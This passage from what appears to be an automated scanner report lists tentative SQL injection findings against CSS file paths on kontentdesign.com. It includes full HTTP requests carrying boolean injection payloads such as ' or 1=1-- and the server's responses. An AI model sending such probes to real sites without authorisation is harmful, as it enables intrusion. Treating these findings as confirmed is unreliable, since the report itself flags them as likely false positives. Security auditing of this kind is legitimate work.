HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 04:02:24 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 567

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /templates10350403' or 1=2-- /kontent11/css/layout.css was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

1.21. http://kontentdesign.com/templates/kontent11/css/layout.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://kontentdesign.com
Path:	/templates/kontent11/css/layout.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 13160980'%20or%201%3d1--%20 and 13160980'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /templates/kontent1113160980'%20or%201%3d1--%20/css/layout.css HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 04:04:11 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 571

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /templates/kontent1113160980' or 1=1-- /css/layout.css
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /templates/kontent1113160980'%20or%201%3d2--%20/css/layout.css HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 04:04:12 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 567

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /templates/kontent1113160980' or 1=2-- /css/layout.css was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

1.22. http://kontentdesign.com/templates/kontent11/css/layout.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://kontentdesign.com
Path:	/templates/kontent11/css/layout.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 29878068'%20or%201%3d1--%20 and 29878068'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /templates/kontent11/css29878068'%20or%201%3d1--%20/layout.css HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 04:06:08 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 571

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /templates/kontent11/css29878068' or 1=1-- /layout.css
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /templates/kontent11/css29878068'%20or%201%3d2--%20/layout.css HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 04:06:09 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 567

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /templates/kontent11/css29878068' or 1=2-- /layout.css was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

1.23. http://kontentdesign.com/templates/kontent11/css/layout.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://kontentdesign.com
Path:	/templates/kontent11/css/layout.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 20769589'%20or%201%3d1--%20 and 20769589'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /templates/kontent11/css/layout.css20769589'%20or%201%3d1--%20 HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 04:07:56 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 571

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /templates/kontent11/css/layout.css20769589' or 1=1--
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /templates/kontent11/css/layout.css20769589'%20or%201%3d2--%20 HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 04:08:06 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 567

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /templates/kontent11/css/layout.css20769589' or 1=2-- was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

1.24. http://kontentdesign.com/templates/kontent11/css/layout.css [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://kontentdesign.com
Path:	/templates/kontent11/css/layout.css

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 87086877%20or%201%3d1--%20 and 87086877%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /templates/kontent11/css/layout.css?187086877%20or%201%3d1--%20=1 HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 03:09:04 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 552

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /templates/kontent11/css/layout.css
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /templates/kontent11/css/layout.css?187086877%20or%201%3d2--%20=1 HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:09:05 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Last-Modified: Thu, 13 Jan 2011 07:46:43 GMT
Accept-Ranges: bytes
Cache-Control: max-age=1209600
Expires: Tue, 08 Feb 2011 03:09:05 GMT
Vary: Accept-Encoding
Content-Type: text/css
Content-Length: 5184

/* Copyright (C) 2007 - 2011 YOOtheme GmbH, YOOtheme Proprietary Use License (http://www.yootheme.com/license) */

body {
   font-family: Arial, Helvetica, sans-serif;
   font-size: 12px;
   line-height: 150%;
   color: #646464;
}

.wrapper { margin: auto; }

#header {
   position: relative;
   z-index: 10;
   height: 150px;
   clear: both;
}

#top {
   overflow: hidden;
   clear: both;
}

#top .topbox { margin-top: 15px; }

#middle {
   padding: 15px 0px 15px 0px;
   clear: both;
}

#bottom {
   overflow: hidden;
   clear: both;
}

#bottom .bottombox { padding-bottom: 15px; }

#footer {
   position: relative;
   padding-bottom: 15px;
   clear: both;
   text-align: center;
}

#middle {
   width: 100%;

   overflow: hidden;
   position: relative;
}

#middle-expand {
   width: 200%;
}

#main {
   position: relative;
   left: 50%;
   width: 50%;
   float: left;
}

#main-shift {
   position: relative;
   left: -100%;


   overflow: hidden;
}

#left {
   position: relative;
   left: -50%;

   float: left;
   overflow:hidden;
}

#right {


   float: left;
   overflow:hidden;
}

div#maintop,
div#contenttop {
   margin: 0px 0px 15px 0px;
   overflow: hidden;
}

div#contentbottom,
div#mainbottom {
   margin: 15px 0px 0px 0px;
   overflow: hidden;
}

#mainmiddle {
   width: 100%;

   overflow: hidden;
   position: relative;
}

#mainmiddle-expand {
   width: 200%;
}

#content {
   position: relative;
   left: 50%;
   width: 50%;
   float: left;
}

#content-shift {
   position: relative;
   left: -100%;


   overflow: hidden;
}

#contentleft {
   position: relative;
   left: -50%;

   float: left;
   overflow:hidden;
}

#conte
...[SNIP]...

1.25. http://kontentdesign.com/templates/kontent11/css/reset.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://kontentdesign.com
Path:	/templates/kontent11/css/reset.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 76820719'%20or%201%3d1--%20 and 76820719'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /templates76820719'%20or%201%3d1--%20/kontent11/css/reset.css HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 04:01:20 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 570

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /templates76820719' or 1=1-- /kontent11/css/reset.css
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /templates76820719'%20or%201%3d2--%20/kontent11/css/reset.css HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 04:01:21 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 566

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /templates76820719' or 1=2-- /kontent11/css/reset.css was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

1.26. http://kontentdesign.com/templates/kontent11/css/reset.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://kontentdesign.com
Path:	/templates/kontent11/css/reset.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 16077229'%20or%201%3d1--%20 and 16077229'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /templates/kontent1116077229'%20or%201%3d1--%20/css/reset.css HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 04:03:08 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 570

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /templates/kontent1116077229' or 1=1-- /css/reset.css
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /templates/kontent1116077229'%20or%201%3d2--%20/css/reset.css HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 04:03:18 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 566

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /templates/kontent1116077229' or 1=2-- /css/reset.css was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

1.27. http://kontentdesign.com/templates/kontent11/css/reset.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://kontentdesign.com
Path:	/templates/kontent11/css/reset.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 26624147'%20or%201%3d1--%20 and 26624147'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /templates/kontent11/css26624147'%20or%201%3d1--%20/reset.css HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 04:04:55 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 570

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /templates/kontent11/css26624147' or 1=1-- /reset.css
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /templates/kontent11/css26624147'%20or%201%3d2--%20/reset.css HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 04:05:05 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 566

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /templates/kontent11/css26624147' or 1=2-- /reset.css was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

1.28. http://kontentdesign.com/templates/kontent11/css/reset.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://kontentdesign.com
Path:	/templates/kontent11/css/reset.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 13324620'%20or%201%3d1--%20 and 13324620'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

